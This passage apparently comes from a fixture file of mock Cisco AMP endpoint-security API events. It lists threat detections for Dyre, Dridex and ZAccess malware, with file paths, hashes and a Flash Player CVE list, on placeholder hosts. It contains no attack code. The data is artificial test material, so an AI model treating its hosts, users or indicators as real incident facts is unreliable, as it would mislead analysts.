Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256228272898082","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209416879210000,"timestamp":1610705188,"timestamp_nanoseconds":769000000,"date":"2021-01-15T10:06:28+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209416879210513","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209412584243000,"timestamp":1610705187,"timestamp_nanoseconds":755000000,"date":"2021-01-15T10:06:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209412584243216","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256181028258000,"timestamp":1610705182,"timestamp_nanoseconds":0,"date":"2021-01-15T10:06:22+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256181028257825","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256125193683000,"timestamp":1610705169,"timestamp_nanoseconds":972000000,"date":"2021-01-15T10:06:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256125193682976","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256073654075000,"timestamp":1610705157,"timestamp_nanoseconds":960000000,"date":"2021-01-15T10:05:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256073654075423","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533665784395203000,"timestamp":1610705155,"timestamp_nanoseconds":851000000,"date":"2021-01-15T10:05:55+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955899829000000,"timestamp":1610705149,"timestamp_nanoseconds":829000000,"date":"2021-01-15T10:05:49+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610705149,"start_date":"2021-01-15T10:05:49+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"FlashPlayerApp.exe","identity":{"sha256":"c1219f0799e60ff48a9705b63c14168684aed911610fec68548ea08f605cc42b"}},"vulnerabilities":[{"name":"Adobe Flash Player","version":"11.5.502.146","cve":"CVE-2013-3333","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3333"},{"cve":"CVE-2014-0502","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0502"},{"cve":"CVE-2014-0498","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0498"},{"cve":"CVE-2014-0497","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0497"},{"cve":"CVE-2014-0492","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0492"},{"cve":"CVE-2014-0491","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0491"},{"cve":"CVE-2013-5332","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5332"},{"cve":"CVE-2013-5324","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5324"},{"cve":"CVE-2013-5329","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5329"},{"cve":"CVE-2013-5330","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5330"},{"cve":"CVE-2013-3361","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3361"},{"cve":"CVE-2013-3362","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3362"},{"cve":"CVE-2013-3363","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3363"},{"cve":"CVE-2013-3344","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3344"},{"cve":"CVE-2013-3345","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3345"},{"cve":"CVE-2013-3347","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3347"},{"cve":"CVE-2013-3343","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3343"},{"cve":"CVE-2013-2728","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2728"},{"cve":"CVE-2013-3324","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3324"},{"cve":"CVE-2013-3325","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3325"},{"cve":"CVE-2013-3326","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3326"},{"cve":"CVE-2013-3327","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3327"},{"cve":"CVE-2013-3328","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3328"},{"cve":"CVE-2013-3329","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3329"},{"cve":"CVE-2013-3330","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3330"},{"cve":"CVE-2013-3331","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3331"},{"cve":"CVE-2013-3332","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3332"},{"cve":"CVE-2013-3334","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3334"},{"cve":"CVE-2013-3335","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3335"},{"cve":"CVE-2013-1378","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1378"},{"cve":"CVE-2013-1379","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1379"},{"cve":"CVE-2013-1380","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1380"},{"cve":"CVE-2013-2555","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2555"},{"cve":"CVE-2013-0646","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0646"},{"cve":"CVE-2013-0650","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0650"},{"cve":"CVE-2013-1371","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1371"},{"cve":"CVE-2013-1375","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1375"},{"cve":"CVE-2013-0504","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0504"},{"cve":"CVE-2013-0638","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0638"},{"cve":"CVE-2013-0639","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0639"},{"cve":"CVE-2013-0642","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0642"},{"cve":"CVE-2013-0644","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0644"},{"cve":"CVE-2013-0645","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0645"},{"cve":"CVE-2013-0647","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0647"},{"cve":"CVE-2013-0649","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0649"},{"cve":"CVE-2013-1365","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1365"},{"cve":"CVE-2013-1366","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1366"},{"cve":"CVE-2013-1367","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1367"},{"cve":"CVE-2013-1368","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1368"},{"cve":"CVE-2013-1369","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1369"},{"cve":"CVE-2013-1370","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1370"},{"cve":"CVE-2013-1372","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1372"},{"cve":"CVE-2013-1373","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1373"},{"cve":"CVE-2013-1374","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1374"},{"cve":"CVE-2014-0507","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0507"},{"cve":"CVE-2013-5331","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5331"},{"cve":"CVE-2013-0648","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0648"},{"cve":"CVE-2013-0643","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0643"},{"cve":"CVE-2013-0634","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0634"},{"cve":"CVE-2013-0633","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0633"},{"cve":"CVE-2014-0499","score":7.8,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0499"},{"cve":"CVE-2014-0503","score":6.4,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0503"}]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364536253907000,"timestamp":1610705149,"timestamp_nanoseconds":228000000,"date":"2021-01-15T10:05:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Backdoor2:ZAccess-tpd","detection_id":"5832364536253906973","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"80000000.@","file_path":"\\\\?\\C:\\$Recycle.Bin\\S-1-5-18\\$ff20833dbb78e410a1126d2ca0eecb73\\U\\80000000.@","identity":{"sha256":"9a9de323dc2ba4059c3eb10d20e8b93a4cc44c93ac41a5dfc9572fa1c0d5b1a8","sha1":"f18d87d7c547ed6118b74b2208e592f67b7fca43","md5":"800381acbba0e7bff6cfd0cfd704bf09"},"parent":{"process_id":496,"disposition":"Clean","file_name":"services.exe","identity":{"sha256":"d7bc4ed605b32274b45328fd9914fb0e7b90d869a38f0e6f94fb1bf4e9e2b407","sha1":"54a90c371155985420f455361a5b3ac897e6c96e","md5":"5f1b6a9c35d3d5ca72d6d6fdef9747d6"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255953394991000,"timestamp":1610705129,"timestamp_nanoseconds":942000000,"date":"2021-01-15T10:05:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176255953394991134","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364428879725000,"timestamp":1610705124,"timestamp_nanoseconds":271000000,"date":"2021-01-15T10:05:24+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Kazy:Troj_Generic-tpd","detection_id":"5832364394519986204","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"n","file_path":"\\\\?\\C:\\$Recycle.Bin\\S-1-5-18\\$ff20833dbb78e410a1126d2ca0eecb73\\n","identity":{"sha256":"c9dbfc24f40bc1aa49bd8eac43eb08c26d4587b926f7bacb94cb44a87cdc5600","sha1":"9f9cc367265c8e04747004f4bb122d6084c9bd79","md5":"69bc8b1dcfde7443d80d4b34b45bd193"},"parent":{"process_id":3924,"disposition":"Clean","file_name":"InstallFlashPlayer.exe","identity":{"sha256":"672ec8dceafd429c1a09cfafbc4951968953e2081e0d97243040db16edb24429","sha1":"5c921b125bac24670d2bf27659e100cdf24e7e7f","md5":"2ff9b590342c62748885d459d082295f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255919035253000,"timestamp":1610705121,"timestamp_nanoseconds":628000000,"date":"2021-01-15T10:05:21+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176255919035252765","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jwenjktgenwrger234231.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Desktop\\D94038FDE7B0F343931DF8040B\\jwenjktgenwrger234231.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"},"parent":{"process_id":3652,"disposition":"Malicious","file_name":"webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255919035253000,"timestamp":1610705121,"timestamp_nanoseconds":612000000,"date":"2021-01-15T10:05:21+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176255919035252764","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255919035253000,"timestamp":1610705121,"timestamp_nanoseconds":487000000,"date":"2021-01-15T10:05:21+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255919035252763","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364411699855000,"timestamp":1610705120,"timestamp_nanoseconds":846000000,"date":"2021-01-15T10:05:20+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364364455215109","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11938f43-647341ab","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\LocalLow\\Sun\\Java\\Deployment\\cache\\6.0\\3\\11938f43-647341ab","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"},"parent":{"process_id":3428,"disposition":"Clean","file_name":"java.exe","identity":{"sha256":"0b4eefc0d815ac0fdc20f22add8fd2d8113be99578a4e5189122b28b201ccbd9","sha1":"69434b7adf90c7f2f53612816366885fcd8e27b3","md5":"4d3663c67b30eedf4a6c8a711e7fe6f9"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364411699855000,"timestamp":1610705120,"timestamp_nanoseconds":839000000,"date":"2021-01-15T10:05:20+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364364455215107","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"},"parent":{"process_id":3428,"disposition":"Clean","file_name":"java.exe","identity":{"sha256":"0b4eefc0d815ac0fd